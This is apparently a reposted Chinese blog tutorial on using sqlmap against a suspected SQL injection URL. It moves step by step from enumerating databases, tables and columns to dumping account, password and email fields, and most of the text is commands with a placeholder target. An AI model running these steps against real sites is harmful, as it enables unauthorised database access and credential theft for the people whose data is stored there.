zoukankan      html  css  js  c++  java
  • 一次sqlmap注入某注入点并且dump出账号密码全程

    利用OWASP ZAP 安全扫描工具扫描可能存在注入的url

    判断注入点:sqlmap.py -u “存在注入url”

    爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs

    查看当前使用账号:sqlmap.py -u “存在注入url” --current-user

    //打**的是关键看我下面的四步走

    1、**查看当前数据库:sqlmap.py -u “存在注入url” --current-db

    2、**列出数据库中所有表:sqlmap.py -u “存在注入url” --tables,除了这样也可以这样整,如下所示:sqlmap.py -u “存在注入url” -D “当前数据库名” --tables   //解释说明:-D是指定数据库名称。

    3、**-T是指定列要出字段的表,就是数据库中的表名。

    列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” --columns。

    4、**跑出来表中的字段然后暴力拆解账号和密码,一般字段账号密码都是user/pass/password/username/keyword这些等等,自己找敏感的字段然后进行拆解。

    -C指定要暴力拆解的字段

    暴力拆解账号密码:sqlmap.py -u “存在注入url ” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “username,password,email(columns(字段)中疑似网站账号密码邮箱等敏感字段,举例子说明)” --dump

     --dump将结果导出。

  • 相关阅读:
    生成器
    ELK出现unassigned_shards解决办法
    ElK集群 采集 redis 数据
    postgresql-12编译安装
    openshift 3.11安装部署
    Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法
    zabbix-server安装部署配置
    zabbix-proxy安装部署
    harbor镜像仓库-02-https访问配置
    harbor镜像仓库-01-搭建部署
  • 原文地址:https://www.cnblogs.com/zhangwangvip/p/13810160.html
Copyright © 2011-2022 走看看